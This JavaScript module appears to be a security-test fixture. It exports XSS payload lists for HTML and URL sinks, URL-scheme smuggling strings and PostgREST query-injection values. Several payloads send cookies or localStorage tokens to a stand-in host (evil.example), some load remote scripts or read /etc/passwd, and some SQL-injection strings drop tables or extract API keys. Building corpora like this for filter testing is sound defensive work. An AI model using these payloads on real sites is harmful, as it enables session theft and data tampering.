'use strict';
/**
 * Attack corpora. Every payload is designed to either execute script, load an
 * attacker resource, or break out of the context it is rendered into.
 *
 * Sources for the families: OWASP XSS Filter Evasion cheat sheet, OWASP ASVS 5.x
 * output-encoding requirements, the HTML5 parsing edge cases that produce mutation
 * XSS (mXSS), and real-world URL-scheme smuggling techniques.
 */

/** Injectable markup for text sinks (titles, names, captions, messages...) */
const HTML_PAYLOADS = [
    '<script>window.__xss=1</script>',
    '<script src=//evil.example/x.js></script>',
    '<img src=x onerror=window.__xss=2>',
    '<img src=x onerror="window.__xss=3">',
    '<img/src=x/onerror=window.__xss=4>',
    '<IMG SRC=x ONERROR=window.__xss=5>',
    '<img src=x OnErRoR=window.__xss=6>',
    '<svg onload=window.__xss=7>',
    '<svg/onload=window.__xss=8>',
    '<svg\nonload=window.__xss=9>',
    '<svg><script>window.__xss=10</script></svg>',
    '<svg><animate onbegin=window.__xss=11 attributeName=x dur=1s>',
    '<svg><foreignObject><img src=x onerror=window.__xss=12></foreignObject></svg>',
    '<svg><set attributeName=onmouseover to=window.__xss=13>',
    '<iframe srcdoc="<script>parent.__xss=14</script>"></iframe>',
    '<iframe src=javascript:window.__xss=15></iframe>',
    '<iframe src="data:text/html,<script>parent.__xss=16</script>"></iframe>',
    '<object data=javascript:window.__xss=17></object>',
    '<embed src=javascript:window.__xss=18>',
    '<details open ontoggle=window.__xss=19>',
    '<input autofocus onfocus=window.__xss=20>',
    '<select autofocus onfocus=window.__xss=21>',
    '<textarea autofocus onfocus=window.__xss=22>',
    '<body onload=window.__xss=23>',
    '<marquee onstart=window.__xss=24>',
    '<video><source onerror=window.__xss=25>',
    '<audio src=x onerror=window.__xss=26>',
    '<a href=javascript:window.__xss=27>click</a>',
    '<a href="jAvAsCrIpT:window.__xss=28">click</a>',
    '<form action=javascript:window.__xss=29><input type=submit></form>',
    '<button formaction=javascript:window.__xss=30>go</button>',
    '<base href=//evil.example/>',
    '<meta http-equiv=refresh content="0;url=//evil.example">',
    '<link rel=stylesheet href=//evil.example/x.css>',
    '<style>@import "//evil.example/x.css";</style>',
    '<style>body{background:url(javascript:window.__xss=31)}</style>',
    '<math><mtext><table><mglyph><style><!--</style><img src=x onerror=window.__xss=32>',
    '<noscript><p title="</noscript><img src=x onerror=window.__xss=33>">',
    '<template><img src=x onerror=window.__xss=34></template>',
    '<xmp><img src=x onerror=window.__xss=35></xmp>',
    '<plaintext><img src=x onerror=window.__xss=36>',
    '<title><img src=x onerror=window.__xss=37></title>',
    '<isindex action=javascript:window.__xss=38 type=image>',
    '<!--<img src=x onerror=window.__xss=39>-->',
    '<!--><img src=x onerror=window.__xss=40>',
    '<![CDATA[<img src=x onerror=window.__xss=41>]]>',
    '"><img src=x onerror=window.__xss=42>',
    "'><img src=x onerror=window.__xss=43>",
    '`><img src=x onerror=window.__xss=44>',
    '</textarea><img src=x onerror=window.__xss=45>',
    '</title><img src=x onerror=window.__xss=46>',
    '</script><img src=x onerror=window.__xss=47>',
    '</div></section></main><img src=x onerror=window.__xss=48>',
    '{{constructor.constructor("window.__xss=49")()}}',
    '${window.__xss=50}',
    '#{window.__xss=51}',
    '<img src=x onerror=window.__xss=52//>',
    '<img src=x onerror=window.__xss=53 -->',
    '<img\nsrc=x\nonerror=window.__xss=54>',
    '<img\tsrc=x\tonerror=window.__xss=55>',
    '<img src=x onerror=window.__xss=56 style=display:block>',
    '&lt;img src=x onerror=window.__xss=57&gt;',
    '&#60;img src=x onerror=window.__xss=58&#62;',
    '\\u003cimg src=x onerror=window.__xss=59\\u003e',
    '<scr<script>ipt>window.__xss=60</scr</script>ipt>',
    '<img src=x onerror=top.__xss=61>',
    '<img src=x onerror=window["__xss"]=62>',
    '<img src=x onerror=parent.__xss=63>',
    '<a href="\u202Ejavascript:window.__xss=64">x</a>',
    '<meta charset=x><img src=x onerror=window.__xss=65>',
    '<object type="text/x-scriptlet" data="//evil.example/x.sct"></object>',
    '<img src=x onerror=document.domain="evil.example">',
    '<img src=x onerror=document.cookie="pwned=1">',
    '<img src=x onerror=fetch("//evil.example/steal?c="+document.cookie)>',
    '<img src=x onerror=fetch("//evil.example/steal?t="+localStorage.sb_token)>',
    '<img src=x onerror=fetch("//evil.example/steal?t="+localStorage.getItem("sa_token"))>',
    '<img src=x onerror=navigator.sendBeacon("//evil.example",localStorage.sb_token)>',
    '<img src=x onerror=window.open("//evil.example")>',
    '<img src=x onerror=eval("window.__xss=66")>',
    '<img src=x onerror=Function("window.__xss=67")()>',
    "<img src=x onerror=alert(String.fromCharCode(88))>",
    '<img src=x onerror=import("//evil.example/x.js")>',
];

/** Payloads for sinks that become URLs (src/href/background/iframe) */
const URL_PAYLOADS = [
    'javascript:window.__xss=101',
    'JaVaScRiPt:window.__xss=102',
    ' javascript:window.__xss=103',
    '\tjavascript:window.__xss=104',
    '\njavascript:window.__xss=105',
    'java\tscript:window.__xss=106',
    'java\nscript:window.__xss=107',
    'jav\u0000ascript:window.__xss=108',
    'javascript&colon;window.__xss=109',
    '&#106;avascript:window.__xss=110',
    '&#x6a;avascript:window.__xss=111',
    'data:text/html,<script>window.__xss=112</script>',
    'data:text/html;base64,PHNjcmlwdD53aW5kb3cuX194c3M9MTEzPC9zY3JpcHQ+',
    'data:image/svg+xml,<svg onload=window.__xss=114>',
    'vbscript:window.__xss=115',
    'VBScript:window.__xss=116',
    'blob:https://evil.example/4b1c',
    'file:///etc/passwd',
    'about:blank',
    'view-source:https://evil.example',
    'chrome://settings',
    '//evil.example/x',
    '\\\\evil.example\\x',
    'https://ok.example/a.jpg" onload="window.__xss=117',
    "https://ok.example/a.jpg') ; background:url('javascript:window.__xss=118",
    'https://ok.example/a.jpg");</style><img src=x onerror=window.__xss=119>',
    'https://ok.example/a b.jpg',
    'https://ok.example/%0a%0d/x',
    'https://ok.example/#"><img src=x onerror=window.__xss=120>',
    'https://ok.example/?q=<script>window.__xss=121</script>',
    'https://ok.example/a.jpg\u0000.html',
    '/relative/path.jpg',
    'https://user:pass@ok.example/a.jpg',
    'http://[::1]/x',
    'https://ok.example/legit.jpg',
    'HTTPS://OK.EXAMPLE/A.JPG',
];

/** Control values that must keep working (no over-blocking regression) */
const URL_CONTROLS = ['https://ok.example/legit.jpg', 'https://ok.example/a b.jpg', '/relative/path.jpg', 'http://ok.example/x.png'];

/** Values injected into PostgREST query filters (?key=eq.VALUE) */
const QUERY_PAYLOADS = [
    '1&or=(school_name.eq.x)',
    "1' or '1'='1",
    '1)',
    '*',
    'a,b',
    'eq.1',
    '1%00',
    '1&select=*',
    '1&limit=1000',
    'not.is.null',
    '1&school_id=neq.1',
    '1&apikey=leak',
    '%',
    '_',
    '1;drop table schools--',
    "1'||(select api_key from schools limit 1)||'",
    '1#',
    '1&id=neq.0',
];

module.exports = { HTML_PAYLOADS, URL_PAYLOADS, URL_CONTROLS, QUERY_PAYLOADS };
